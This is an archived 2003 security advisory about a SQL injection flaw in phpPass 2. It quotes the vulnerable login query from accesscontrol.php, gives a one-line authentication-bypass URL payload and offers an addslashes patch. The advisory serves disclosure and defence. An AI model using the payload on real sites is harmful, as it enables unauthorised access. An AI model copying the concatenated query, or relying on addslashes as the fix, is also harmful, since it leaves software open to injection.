Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: PHP :: sb5937.htm

phpPass sql injection



20th Jan 2003 [SBWID-5937]
COMMAND

	phpPass sql injection

SYSTEMS AFFECTED

	phpPass 2

PROBLEM

	Frog Man [leseulfrog@hotmail.com] found :
	
	 http://www.frog-man.org/tutos/phpPass.txt
	
	 PHP Code/Location :
	 같같같같같같같같같
	
	accesscontrol.php :
	------------------------------------------------
	[...]
	session_register("uid");
	session_register("pwd");
	[...]
	$sql = "SELECT * FROM user WHERE
	        userid = '$uid' AND password = '$pwd'";
	$result = mysql_query($sql);
	[...]
	if (mysql_num_rows($result) == 0) {
	  session_unregister("uid");
	  session_unregister("pwd");
	  ?>
	  <html>
	  <head>
	  <title> Access Denied </title>
	[...]
	  exit;
	[...]
	------------------------------------------------
	
	
	Exploit : 같같같같
	
	 http://[target]/protectedpage.php?uid='%20OR%20''='&pwd='%20OR%20''='
	
	

SOLUTION

	A patch can be found on http://www.phpsecure.org
	
	 Patch :
	 같같같
	
	In accesscontrol.php, replace the lines :
	
	-------------------------------------------------
	$sql = "SELECT * FROM user WHERE
	        userid = '$uid' AND password = '$pwd'";
	$result = mysql_query($sql);
	------------------------------------------------
	
	by :
	
	------------------------------------------------------------------------
	$uid=addslashes($uid);
	$pwd=addslashes($pwd);
	$sql = "SELECT * FROM user WHERE userid = '$uid' AND password = '$pwd'";
	$result = mysql_query($sql);
	------------------------------------------------------------------------
	


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH